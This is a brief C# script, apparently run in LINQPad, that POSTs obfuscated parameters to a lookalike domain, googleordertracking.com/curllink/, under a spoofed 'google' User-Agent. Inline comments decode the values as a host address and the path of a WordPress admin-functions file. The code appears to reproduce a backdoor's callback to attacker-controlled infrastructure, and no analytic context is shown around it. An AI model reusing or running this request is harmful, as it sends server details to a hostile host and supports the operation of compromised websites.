System System.Collections.Generic System.Collections.Specialized System.Data.SqlTypes System.Globalization System.IO System.Linq System.Net System.Security.Cryptography System.Text System.Threading.Tasks System.IO.Compression using(var webClient = new WebClient()) { var postData = new NameValueCollection(); postData.Add("d", "2GArIAwQCBwMXLDNzwJe"); // 127.0.0.1 postData.Add("p", "=ksD/wBAKIjC1PfhTzczJz0TWvyzMnsLL18KPd9Lv8i0ss0LTzJe"); // /var/www/functions/admin-functions.php postData.Add("a", "wp"); var url = "http://googleordertracking.com/curllink/"; webClient.Headers["User-Agent"] = "google"; var response = webClient.UploadValues(url, "POST", postData); Encoding.UTF8.GetString(response).Dump(); }